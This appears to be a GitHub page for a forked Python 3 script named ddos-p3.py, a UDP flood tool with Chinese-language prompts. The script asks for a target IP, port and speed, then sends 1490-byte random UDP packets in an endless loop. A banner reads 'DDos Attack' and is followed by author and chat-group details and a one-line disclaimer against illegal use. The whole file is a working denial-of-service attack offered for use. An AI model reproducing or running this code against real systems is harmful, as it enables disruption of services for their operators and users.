forked from Andysun06/ddos
-
Notifications
You must be signed in to change notification settings - Fork 0
/
ddos-p3.py
46 lines (40 loc) · 1.18 KB
/
ddos-p3.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
# python3
import sys
import os
import time
import socket
import random
#Code Time
from datetime import datetime
now = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year
##############
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
#############
os.system("clear")
os.system("figlet DDos Attack")
print (" ")
print ("/---------------------------------------------------\ ")
print ("| 作者 : Andysun06 |")
print ("| 作者github : https://github.com/Andysun06 |")
print ("| kali-QQ学习群 : 909533854 |")
print ("| 版本 : V1.0.0 |")
print ("\---------------------------------------------------/")
print (" ")
print (" -----------------[请勿用于违法用途]----------------- ")
print (" ")
ip = input("请输入 IP : ")
port = int(input("攻击端口 : "))
sd = int(input("攻击速度(1~1000) : "))
os.system("clear")
sent = 0
while True:
sock.sendto(bytes, (ip,port))
sent = sent + 1
print ("已发送 %s 个数据包到 %s 端口 %d"%(sent,ip,port))
time.sleep((1000-sd)/2000)